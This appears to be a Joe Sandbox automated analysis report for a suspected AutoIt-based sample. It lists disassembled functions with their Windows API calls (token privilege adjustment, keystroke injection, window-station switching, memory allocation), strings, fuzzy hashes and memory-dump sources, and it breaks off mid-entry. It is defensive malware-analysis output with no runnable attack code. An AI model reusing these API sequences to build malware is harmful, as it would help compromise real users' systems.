Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 0e2eada716f10de5c7a550d5ce544e7ae7b7be83000562bad2061c22ff6756ed
Instruction ID: 40d1dbef7188dbbf8ea065724f3c42c985934efca8843900e6e55efadf6f5c88
Opcode Fuzzy Hash: 0e2eada716f10de5c7a550d5ce544e7ae7b7be83000562bad2061c22ff6756ed
Instruction Fuzzy Hash: 9611D232D0411DEBDF14EBA5DC81DEEB7B8EF54360F40812AF819A7191DA349E05CB94

Function 00074DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00074BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00074BEF

Part of subcall function 0009525B: __wfsopen.LIBCMT ref: 00095266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,001352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00074E0F

Part of subcall function 00074B6A: FreeLibrary.KERNEL32(00000000), ref: 00074BA4

Part of subcall function 00074C70: _memmove.LIBCMT ref: 00074CBA

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 8c9d5f66ee8a6be6f1347ef0ac298e7e5a29840cf9a907983a4f3e272e10bdc2
Instruction ID: c12848f583b5bbf1212afffed8f9479c12a7b44cd2770a3ece67f85ae3108c2c
Opcode Fuzzy Hash: 8c9d5f66ee8a6be6f1347ef0ac298e7e5a29840cf9a907983a4f3e272e10bdc2
Instruction Fuzzy Hash: 1711A731A00205ABCF15BF74CC56FED77A5AF44710F10C429F54AA7182DF799D019B55

Function 000AFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 000AFD91

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 83bc5b65ba88b8bb5467c469da78a2a8dc29fd002d4710a5c38406f59d7c03fa
Instruction ID: 0d2abe792cc109167ef607192edaf0ac1196533b511ae028a08c4038bf73c0a8
Opcode Fuzzy Hash: 83bc5b65ba88b8bb5467c469da78a2a8dc29fd002d4710a5c38406f59d7c03fa
Instruction Fuzzy Hash: 2F2142B0A08301DFCB24DF64C444B6ABBE0BF89314F05896CF89A47722D735E805CB96

Function 00075BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,000756A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00075C16

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 431c5e8ed60d516bd67ce654c645f72bcecce2057197bda10390b03279d30c52
Instruction ID: 27e25ca152dbe60ca1382cf975ae7755d275d85880d7c1598b8c266bb452bfb6
Opcode Fuzzy Hash: 431c5e8ed60d516bd67ce654c645f72bcecce2057197bda10390b03279d30c52
Instruction Fuzzy Hash: 6A112831600B459FD3318F19C880BA6B7F4EF44761F10C92DE99A86A51D7B8F845CB64

Function 0009072A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000907B0

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 8aea39384f5b77c4a18eea9bec793375deb1b76bc4860d3a4c2cbe7e8948f2f4
Instruction ID: 2f2d14c9c778258768fc9774f74ac9bd4404a8f4edccdc46edef82518b48becf
Opcode Fuzzy Hash: 8aea39384f5b77c4a18eea9bec793375deb1b76bc4860d3a4c2cbe7e8948f2f4
Instruction Fuzzy Hash: E0F02B3A5441049FEB119A54BC03AF5F7ADEF82331B2091BAFC09D7C52D6304C879AE1

Function 00094863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 000948A6

Part of subcall function 00098B28: __getptd_noexit.LIBCMT ref: 00098B28

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: f7b149089fedb17cce5590c1a00e971e040f364267721780b067abcc17d69777
Instruction ID: 24bb45a33c8568ec5a81e45067505d475a4319c5f0e8106b8611b51c9bc50972
Opcode Fuzzy Hash: f7b149089fedb17cce5590c1a00e971e040f364267721780b067abcc17d69777
Instruction Fuzzy Hash: 80F0AF31901609ABDF51AFB48C06BEF37A0AF02325F158514F4249A2D2CF788952FB51

Function 00074E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,001352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00074E7E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 26e9e706f4e3452750957abf918dbaf10864c4e1d4dc47341a036f785cc12905
Instruction ID: 588489bf3051b1393ecb7fe67fe5d463f8f33a0603e04f1b5f4d1daa678de80a
Opcode Fuzzy Hash: 26e9e706f4e3452750957abf918dbaf10864c4e1d4dc47341a036f785cc12905
Instruction Fuzzy Hash: 7FF03971901712CFCB359F64E894826BBE1BF24339321CA3EE1DA82620C77A9840EF44

Function 00090791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000907B0

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 5c299e6e1cfc2cb4367d4c90cc23faafc401ba3d3e7053b6abc454aa3a5a3732
Instruction ID: a15fd3abcb997ace874dcc5c28e921a51d108705f7e5bab4b377d3d5f53998c9
Opcode Fuzzy Hash: 5c299e6e1cfc2cb4367d4c90cc23faafc401ba3d3e7053b6abc454aa3a5a3732
Instruction Fuzzy Hash: A8E0863690422857C72196989C05FFA779DDF896A0F0441B5FC0CD7205D9649C808690

Function 000D8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 000D8EC1

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 9b0a3e1a5fb808be38196f32817445d20a7153da34835e36366bb8425780b66f
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 44E092B0104B005BDB398A24D811BE373E1AB05305F00081DF2AA83342EB627845CB59

Function 00075C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,000ADD42,?,?,00000000), ref: 00075C5F

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a97dc3f17b0c7c65a30c85211fb6f0fcd710f53bc9d20e2a9905123713929a9f
Instruction ID: 06698110785bc912454531cd30e3b21908527a6d9ff656390d9855626ccaf4fd
Opcode Fuzzy Hash: a97dc3f17b0c7c65a30c85211fb6f0fcd710f53bc9d20e2a9905123713929a9f
Instruction Fuzzy Hash: BBD09E74640208BFE610DB80DC46FA9777CEB05710F100194BD045669096B27D509695

Function 0009525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00095266

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 9fb5ad27db7697a50777413cee9d95b892f8809865784e2b364537fb7137d97b
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: FEB0927644020C77CE022A82EC02A893B199B46764F408020FB0C18162A673A664AA89

Function 000DD07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 000DD1FF

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 66e811b92deb865b7911db532457af15e1cb75b02cdaf5ebe9b6e1393a271fcd
Instruction ID: 9d61ac7350c55ffe6846e884b3f9ebb752cb1cb81f488be18c3090e2810073c2
Opcode Fuzzy Hash: 66e811b92deb865b7911db532457af15e1cb75b02cdaf5ebe9b6e1393a271fcd
Instruction Fuzzy Hash: 3E7195346043029FC754EF64C491AAEB7E0EF95350F04492EF99A9B3A2DB34ED05CB66

Function 00090C08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00090CB7

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: a047e5fa47cf3852137d723b5234e6b2d3ba89dde068bade4afa99af3c244753
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1D31B2B0A001069FDB58DF58C495A69F7E6FB59300B6487A5E80ACB355DB31EDC1EBC0

Function 014B22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 014B22B1

Memory Dump Source

Source File: 00000000.00000002.2197145327.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14b0000_25IvlOVEB1.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: da63ca4313d625aecd734d3b0c45a6cf4bd13337808718077515acc4bca1178f
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: DEE0E67494010EDFDB00EFB4D6496EE7FB4EF04301F100261FD01D2281D6709D508A72

Non-executed Functions

Function 000FCABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00072612: GetWindowLongW.USER32(?,000000EB), ref: 00072623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 000FCB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000FCB95
GetWindowLongW.USER32(?,000000F0), ref: 000FCBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000FCC00
SendMessageW.USER32 ref: 000FCC29
_wcsncpy.LIBCMT ref: 000FCC95
GetKeyState.USER32(00000011), ref: 000FCCB6
GetKeyState.USER32(00000009), ref: 000FCCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000FCCD9
GetKeyState.USER32(00000010), ref: 000FCCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000FCD0C
SendMessageW.USER32 ref: 000FCD33
SendMessageW.USER32(?,00001030,?,000FB348), ref: 000FCE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 000FCE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000FCE60
SetCapture.USER32(?), ref: 000FCE69
ClientToScreen.USER32(?,?), ref: 000FCECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000FCEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000FCEF5
ReleaseCapture.USER32 ref: 000FCF00
GetCursorPos.USER32(?), ref: 000FCF3A
ScreenToClient.USER32(?,?), ref: 000FCF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 000FCFA3
SendMessageW.USER32 ref: 000FCFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 000FD00E
SendMessageW.USER32 ref: 000FD03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000FD05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 000FD06D
GetCursorPos.USER32(?), ref: 000FD08D
ScreenToClient.USER32(?,?), ref: 000FD09A
GetParent.USER32(?), ref: 000FD0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 000FD123
SendMessageW.USER32 ref: 000FD154
ClientToScreen.USER32(?,?), ref: 000FD1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000FD1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 000FD20C
SendMessageW.USER32 ref: 000FD22F
ClientToScreen.USER32(?,?), ref: 000FD281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000FD2B5

Part of subcall function 000725DB: GetWindowLongW.USER32(?,000000EB), ref: 000725EC

GetWindowLongW.USER32(?,000000F0), ref: 000FD351

Strings

@GUI_DRAGID, xrefs: 000FCE9C
F, xrefs: 000FD235

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 530b23c0442b28adb1181954612c222d2a98b6ca1b651bc548f83d818a5e5f53
Instruction ID: 3afbea0355cecc68ab55a43c1bfd912f2ea92b0247f3d3af76af72cab3117da1
Opcode Fuzzy Hash: 530b23c0442b28adb1181954612c222d2a98b6ca1b651bc548f83d818a5e5f53
Instruction Fuzzy Hash: 0042BB78604249AFE721CF24C986EBABBE6FF48750F14051DF695C7AA1C731D840EB92

Function 00086F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000871C3
_memset.LIBCMT ref: 00087539
_memmove.LIBCMT ref: 000876AC

Strings

[:<:]], xrefs: 00087479
DEFINE, xrefs: 000C2103
[:>:]], xrefs: 00087492
\b(?=\w), xrefs: 000C3769
\b(?<=\w), xrefs: 000C3773
Q\E, xrefs: 00087FCB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: de63548201c2f66ef570d8dd27d639bd84e76c49b21e7b77b661980c0016edc2
Instruction ID: 1664fd81dd9947a67e102faf3e15334209b8b1671877c605ce203f7a10fe7813
Opcode Fuzzy Hash: de63548201c2f66ef570d8dd27d639bd84e76c49b21e7b77b661980c0016edc2
Instruction Fuzzy Hash: 3993AE75A04219DFDB24DF98C891BADB7F1FF48310F24816EE949AB295E7709E81CB40

Function 000748D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 000748DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000AD665
IsIconic.USER32(?), ref: 000AD66E
ShowWindow.USER32(?,00000009), ref: 000AD67B
SetForegroundWindow.USER32(?), ref: 000AD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000AD69B
GetCurrentThreadId.KERNEL32 ref: 000AD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 000AD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 000AD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 000AD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 000AD6CF
SetForegroundWindow.USER32(?), ref: 000AD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 000AD6E7
keybd_event.USER32(00000012,00000000), ref: 000AD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 000AD6FC
keybd_event.USER32(00000012,00000000), ref: 000AD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 000AD70A
keybd_event.USER32(00000012,00000000), ref: 000AD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 000AD719
keybd_event.USER32(00000012,00000000), ref: 000AD71E
SetForegroundWindow.USER32(?), ref: 000AD721
AttachThreadInput.USER32(?,?,00000000), ref: 000AD748

Strings

Shell_TrayWnd, xrefs: 000AD660

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 245146b867a77798a580385de011042ec1f92dcc5d98e1c77289760b927919f3
Instruction ID: 659b2045fef122278772d09ced86344c82fabaca3d19453b0cfff741f7425a81
Opcode Fuzzy Hash: 245146b867a77798a580385de011042ec1f92dcc5d98e1c77289760b927919f3
Instruction Fuzzy Hash: AF317E71A40318BAFB206BA19C89F7F7E6CEF45B50F104026FA05EA5D1DAB45901FAA1

Function 000C8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 000C87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000C882B
Part of subcall function 000C87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000C8858
Part of subcall function 000C87E1: GetLastError.KERNEL32 ref: 000C8865

_memset.LIBCMT ref: 000C8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 000C83A5
CloseHandle.KERNEL32(?), ref: 000C83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000C83CD
GetProcessWindowStation.USER32 ref: 000C83E6
SetProcessWindowStation.USER32(00000000), ref: 000C83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000C840A

Part of subcall function 000C81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000C8309), ref: 000C81E0
Part of subcall function 000C81CB: CloseHandle.KERNEL32(?,?,000C8309), ref: 000C81F2

Strings

default, xrefs: 000C8405
, xrefs: 000C8362
winsta0, xrefs: 000C83C8

Memory Dump Source

